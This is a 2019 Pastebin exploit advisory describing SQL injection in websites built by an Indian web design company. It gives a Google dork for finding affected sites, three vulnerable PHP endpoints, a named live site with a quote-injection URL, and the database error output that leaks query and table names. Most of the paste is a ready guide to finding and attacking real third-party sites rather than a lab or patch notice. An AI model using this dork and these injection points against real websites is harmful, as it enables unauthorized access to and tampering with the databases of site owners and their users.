KingSkrupellos

T3 Media Web Design Company India SQL Injection

Apr 1st, 2019
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.95 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : T3 Media Web Design Company India SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/04/2019
  7. # Vendor Homepage : t3media.co.in
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Designed And Developed By - t3 media site:in
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Description about Software :
  21. ***************************
  22. T3 Media was founded in 2014 by Chirag Madaan and Jyotish Khanna to address
  23.  
  24. the simple need for local business to improve their online presence with search
  25.  
  26. engine optimization. The company quickly grew to include social media
  27.  
  28. management and web design services.
  29.  
  30. ###################################################################
  31.  
  32. # Impact :
  33. ***********
  34. T3 Media Web Design Company India is prone to an SQL-injection vulnerability because
  35.  
  36. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  37.  
  38. Exploiting this issue could allow an attacker to compromise the application, access or
  39.  
  40. modify data, or exploit latent vulnerabilities in the underlying database.
  41.  
  42. A remote attacker can send a specially crafted request to the vulnerable application and
  43.  
  44. execute arbitrary SQL commands in application`s database. Further exploitation of this
  45.  
  46. vulnerability may result in unauthorized data manipulation.
  47.  
  48. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  49.  
  50. ###################################################################
  51.  
  52. # SQL Injection Exploit :
  53. **********************
  54. /view-details.php?id=[SQL Injection]
  55.  
  56. /traitsBasedOnCategory.php?id=[SQL Injection]
  57.  
  58. /traits.php?id=[SQL Injection]
  59.  
  60. ###################################################################
  61.  
  62. # Example Vulnerable Sites :
  63. *************************
  64. [+] bestsire.in/view-details.php?id=17%27
  65.  
  66. ###################################################################
  67.  
  68. # Example SQL Database Error :
  69. ****************************
  70. An Internal Error has Occured. Please report following error to the webmaster.
  71.  
  72. select * from tbl_traits where prod_id=17'
  73.  
  74. Select Title From TBL_Material Where ID=25'
  75.  
  76. You have an error in your SQL syntax; check the manual that corresponds
  77.  
  78. to your MySQL server version for the right syntax to use near ''' at line 1'
  79.  
  80. ###################################################################
  81.  
  82. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  83.  
  84. ###################################################################
Add Comment
Please, Sign In to add comment